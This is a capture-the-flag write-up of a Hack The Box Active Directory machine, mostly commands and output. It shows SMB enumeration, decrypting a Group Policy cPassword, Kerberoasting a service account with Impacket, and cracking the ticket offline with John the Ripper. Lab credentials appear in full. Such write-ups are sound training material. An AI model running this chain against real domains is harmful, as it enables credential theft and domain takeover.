TL;DR
Pwing a KDC by taking foothold with the cPassword identifiers found in an old GPO. It was impossible to execute commands, so I created paquets to get an arcfour (RC4) TGS for the CIFS service account and cracked the password. That gave me access as Administrator on this KDC.. game over!
nmap -sC -sV -oA nmap/init 10.10.10.100
enum4linux -a 10.10.10.100
# Nmap 7.01 scan initiated Wed Sep 26 21:45:08 2018 as: nmap -sC -sV -oA nmap.init 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.13s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Windows 2003 Kerberos (server time: 2018-09-27 01:45:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003, cpe:/o:microsoft:windows_98
Host script results:
|_smbv2-enabled: Server supports SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 26 21:46:43 2018 -- 1 IP address (1 host up) scanned in 94.85 seconds
Enum4linux shows that Replication can be listed, so by browsing the directories you can easily find:
$ smbclient //10.10.10.100/Replication
smb: \> cd active.htb
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> get Registry.pol
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> get Groups\Groups.xml
$ cat Groups\\Groups.xml <?xml version="1.0" encoding="utf-8"?>
Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User
<
clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
name="active.htb\SVC_TGS" image="2"
changed="2018-07-18 20:46:06"
uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
Properties
<
action="U"
newName=""
fullName=""
description=""
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
changeLogon="0"
noChange="1"
neverExpires="1"
acctDisabled="0"
userName="active.htb\SVC_TGS"/>
User>
</Groups> </
Note the cPassword in the XML file.
python gpocrack/gpocrack.py 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
Password is: GPPstillStandingStrong2k18
Well, so far that’s all I have!
smbclient //10.10.10.100/Users -U=SVC_TGS%GPPstillStandingStrong2k18
smb: \SVC_TGS\Desktop\> get user.txt
This box was not trivial. You couldn’t simply execute commands with CME. In addition, the new access on the SMB sharing with the identifiers found were a rabbit hole.
crackmapexec 10.10.10.100 -u SVC_TGS -p "GPPstillStandingStrong2k18" --shares
CME 10.10.10.100:445 DC [*] Windows 6.1 Build 7601 (name:DC) (domain:ACTIVE)
CME 10.10.10.100:445 DC [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18
CME 10.10.10.100:445 DC [+] Enumerating shares
CME 10.10.10.100:445 DC SHARE Permissions
CME 10.10.10.100:445 DC ----- -----------
CME 10.10.10.100:445 DC ADMIN$ NO ACCESS
CME 10.10.10.100:445 DC IPC$ NO ACCESS
CME 10.10.10.100:445 DC SYSVOL READ
CME 10.10.10.100:445 DC C$ NO ACCESS
CME 10.10.10.100:445 DC Replication READ
CME 10.10.10.100:445 DC NETLOGON READ
CME 10.10.10.100:445 DC Users READ
-u SVC_TGS -p GPPstillStandingStrong2k18 -h 10.10.10.100 -s Users
smbspider.py
********************************************************
* _ *
* | | // \\ *
* ___ _ __ ___ | |__ _\\()//_ *
* / __| '_ ` _ \| '_ \ / // \\ \ *
* \__ \ | | | | | |_) | |\__/| *
* |___/_| |_| |_|_.__/ *
* *
* SMB Spider v2.4, Alton Johnson (alton.jx@gmail.com) *
********************************************************
*] Spidering 1 system(s)...
[
-----
in: 46.9s Completed
With the SVC_TGS service’s credentials, it’s possible to ask kerberos
for more; Request a legitimate TGT and which service(s) this account can
use. Although it’s not possible to execute commands as SVC_TGS with CME
nor MimiKatz, it’s to create packets with impacket similarly
to execute ps> klist
on the machine, for example. This
would give the name(s) of the (SPNs) service principal name(s) to which
the SVC_TGS account has access.
Then, with a SPN and a TGT, creating a TGS-REQ to Kerberos is now possible. The great thing about a TGS is that it allows you to crack the service’s password offline. Yeah! ;)
Here we see that before requesting the TGS for a particular SPN, Impacket makes an (AS_REQ) Authentication Server Request and that the server responds with the TGT for this SVC_TGS service account. Note that the krbtgt doesn’t use the same encryption that the following TGS.
Then Impacket makes a TGS request that includes TGT information.
Finally, the server responds with a TGS and Impacket format it in
krb5tgs
which is recognized by JTR and HC.
ENCRYPTION_TYPE>$*<USERNAME>$<REALM>$<SPN>*$<FIRST_16_BYTES_TICKET>$<REMAINING_TICKET_BYTES> $krb5tgs$<
With a TGS, we can retrieve the Service’s password. If you run Kali, you will need to follow these steps for JTR to recognize the format.
git clone https://github.com/magnumripper/JohnTheRipper.git && cd JohnTheRipper/src
./configure
make <foo> # <-- see the line of the configure ^
cd ../run
./john --test
And then, voilà :)
$ ./john /usr/share/wordlists/rockyou.txt tgs.txt # DON'T use --format=krb5tgs
./john --wordlist=rockyou.txt ~/documents/CTFs/OSCP/HTB/10.10.10.100/CIFS.krb5tgs
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 59.23% (ETA: 18:42:03) 0g/s 1421Kp/s 1421Kc/s 1421KC/s donmegaa..donisayangalia
Ticketmaster1968 (?)
1g 0:00:00:07 DONE (2018-10-20 18:42) 0.1342g/s 1414Kp/s 1414Kc/s 1414KC/s Tiffani143..Thrall
Use the "--show" option to display all of the cracked passwords reliably
Session completed
./john --wordlist=~/rockyou.txt ~/documents/CTFs/OSCP/HTB/10.10.10.100/CIFS.krb5tgs
$ ./git/tools/JohnTheRipper/run/john --show ./documents/CTFs/OSCP/HTB/10.10.10.100/CIFS.krb5tgs
?:Ticketmaster1968
1 password hash cracked, 0 left